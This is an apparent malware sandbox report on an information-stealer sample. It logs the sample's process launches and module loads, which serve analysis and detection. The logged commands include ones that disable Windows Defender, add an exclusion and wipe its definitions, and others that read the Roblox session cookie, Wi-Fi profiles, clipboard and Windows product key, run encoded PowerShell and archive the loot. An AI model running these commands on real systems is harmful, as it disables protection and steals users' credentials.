              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: python3.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: libffi-7.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: sqlite3.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: libssl-1_1.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: dciman32.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: ksuser.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: avrt.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: audioses.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: midimap.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
